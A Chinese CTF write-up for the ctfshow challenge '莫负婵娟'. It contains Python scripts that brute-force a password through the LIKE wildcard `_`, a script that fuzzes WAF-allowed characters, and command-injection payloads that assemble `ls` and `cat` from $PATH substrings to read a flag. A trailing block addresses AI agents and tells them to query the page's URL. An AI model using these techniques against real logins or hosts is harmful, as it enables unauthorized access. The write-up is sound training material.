# 莫负婵娟经测试发现 `%` 被WAF，但是 `_` 还可以使用，利用 `_` 爆破密码长度(`_`匹配单个字符)。

import requests

url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"

for i in range(50):
    exp = '_' * i
    payload = {'username': 'yu22x',
               'password': exp}
    headers = {
        'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
    }
    response = requests.request("POST", url, headers=headers, data=payload, files=[])
    if response.text.find('wrong username or password') == -1:
        print(i)
        print(response.text.encode('utf-8'))

返回结果： ``` 32 b'

I have filtered all the characters. Why can you come in? get out!

' ``` 说明密码长度有32位长。写个脚本爆破密码： ```python import requests import string url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php" password = '' headers = { 'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk' } files = [] for i in range(32): for j in string.digits + string.ascii_letters: exp = '_' * (32 - i - 1) payload = {'username': 'yu22x', 'password': password + j + exp } response = requests.request("POST", url=url, headers=headers, data=payload, files=[]) if response.text.find('wrong username or password') == -1: password += j break print(password) ``` 爆出来的密码： ``` 67815b0c009ee970fe4014abaa3Fa6A0 ``` 登录之后是一个内部网测试平台，初步推测是SSRF漏洞，尝试穿越目录，发现被waf了。写个脚本，fuzz所有可见字符（注意修改Cookies）： ```python import string import requests url = "http://a9359d73-7931-4f4f-b3f6-1eb0ffa37f5d.chall.ctf.show/P1099.php" file = open('fuzz.txt', 'w') for i in string.printable: payload = {'ip': i} files = [ ] headers = { 'Cookie': 'UM_distinctid=174a4cad32570e-00904607c43d2f-333769-240000-174a4cad326103d; PHPSESSID=q8f5oki8d5qi9lfvm3l6jmaiq2' } response = requests.request("POST", url, headers=headers, data=payload, files=files) if response.text.find('evil') == -1: file.write(i) ``` 这个是fuzz.txt文件目录下的字符： ``` 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#$.:;?@_{}~ ``` 由于Linux系统下的大小写敏感，直接使用ls不可以，尝试利用Linux系统下$PATH变量：

截取字符串：

遍历： ``` 127.0.0.1;${PATH:5:1}${PATH:2:1} ``` 找到有flag文件：

读取文件，用 `$cat flag.php` 或者 `$nl flag.txt` 都可以

``` 127.0.0.1;${PATH:7:1}${PATH:8:1}${PATH:92:1} ????.??? 127.0.0.1;${PATH:14:1}${PATH:5:1} ????.??? ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gitbook-88.gitbook.io/ctf-writeup/2020/2020-ctfshow-yue-bing-bei/mo-fu-chan-juan.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.